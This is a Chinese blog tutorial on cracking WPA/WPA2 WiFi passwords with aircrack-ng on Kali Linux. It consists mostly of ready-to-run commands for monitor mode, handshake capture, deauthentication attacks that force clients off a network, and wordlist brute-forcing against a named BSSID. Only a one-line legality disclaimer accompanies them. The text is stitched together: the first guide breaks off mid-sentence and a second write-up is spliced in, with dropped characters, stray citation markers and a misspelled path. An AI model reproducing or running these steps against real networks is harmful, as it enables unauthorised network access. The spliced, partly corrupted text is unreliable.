KALI - 用aircrack-ng暴破wifi密码

KALI - 用aircrack-ng暴破wifi密码

暴破前要先得到目标wifi的握手包。
详细过程请看:KALI - 暴破wifi之抓取握手包
1.准备字典

可以自己百度找字典或者用一些密码生成器生成字典

这里提供使用 kali linux 自带的 rockyou 字典的方法:

该字典的路径为:/user/share/wordlists/rockyou.txt.gz

使用前要先解压:

gzip -d /usr/share/wordlists/rockyou.txt.gz
2.开始暴破
sudo aircrack-ng -a2 -b 04:95:E6:C3:14:A9 -w /usr/share/wordlists/rockyou.txt ~/-01.cap
参数解释:

-a 2 代表WPA的握手包

-b 指定要暴破的wifi的BSSID

-w 指定字典文件

最后是抓取的握手包的路径

或者也可以不指定 -a 和 -b 参数直接

### 使用 Kali Linux 进行 WiFi 密码 #### 工具准备 为了进行 WiFi 解,需要准备好必要的工具和环境。Kali Linux 是一款专门为渗透测试设计的操作系统,内置了许多安全审计工具。 - **网络适配器**:确保使用的无线网卡支持监控模式和数据包注入功能。 - **密码字典**:用于解的密码列表文件,如 `pass.txt` 或者其他自定义词表[^1]。 #### 启动监听并捕获握手包 进入终端命令行界面,通过以下指令来设置无线网卡工作于监测状态: ```bash airmon-ng start wlan0 airodump-ng wlan0mon ``` 当找到目标 AP (Access Point) 后记录下其 BSSID 和信道信息,在新窗口执行更精确的数据抓取操作: ```bash airodump-ng --bssid [BSSID] -c [Channel] -w output_file wlan0mon ``` 此时可以等待客户端自然断开重连获取 handshake;也可以主动发起去认证攻击加快过程: ```bash aireplay-ng --deauth 10 -a [BSSID] -c [Client_MAC_Address] wlan0mon ``` 上述命令会向指定接入点广播多个解除身份验证帧给特定客户机,迫使其重新登录从而产生所需的四次握手消息[^2]。 #### 开始解 一旦获得了包含有效 WPA/WPA2 四路握手的消息 `.cap` 文件,则可利用 Aircrack-ng 来尝试恢复预共享密钥(PSK): ```bash aircrack-ng -w /path/to/password_list.txt -b [Target_BSSID] capture-file.cap ``` 这里 `-w` 参数指定了用来猜测 PSK 的单词表路径,而 `-b` 则限定了要针对哪个 SSID/BSSID 对应的手握包来进行分析处理[^3]。 请注意这种行为仅适用于合法授权下的安全性评估活动之中,并严格遵守法律法规以及道德准则!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值